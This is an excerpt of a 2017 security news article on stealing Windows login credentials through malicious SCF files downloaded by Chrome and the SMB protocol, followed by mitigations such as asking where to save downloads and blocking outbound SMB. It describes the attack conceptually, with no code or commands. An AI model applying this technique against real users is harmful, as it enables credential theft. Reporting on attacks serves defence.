You Can Steal Windows Login Credentials via Google Chrome and SCF Files
By Catalin Cimpanu | May 16, 2017
Just by accessing a folder containing a malicious SCF file, a user will unwittingly share his computer’s login credentials with an attacker via Google Chrome and the SMB protocol.
This technique is not new, but a combination of two different techniques, one taken from the Stuxnet operation, and one detailed by a security researcher at the Black Hat security conference.
…
SCF stands for Shell Command File and is a file format that supports a very limited set of Windows Explorer commands, such as opening a Windows Explorer window or showing the Desktop. The “Show Desktop” shortcut we all use on a daily basis is an SCF file.
…
As a way to mitigate these types of attacks, Stankovic advises that users configure their Chrome browser to ask where to save each file individually.
Users can do this by visiting:
Settings -> Show advanced settings -> Ask where to save each file before downloading
More advanced protection measures include blocking outbound SMB requests via firewalls, so local computers can’t query remote SMB servers.
Read the full article here
